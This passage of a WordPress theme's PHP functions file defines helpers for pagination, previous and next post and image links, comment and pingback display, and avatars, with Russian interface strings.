			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Следующие записи <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Предыдущие записи', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущие записи', THEME_NS) : __('Следующие записи', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">сказал:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s - %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Ссылки:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}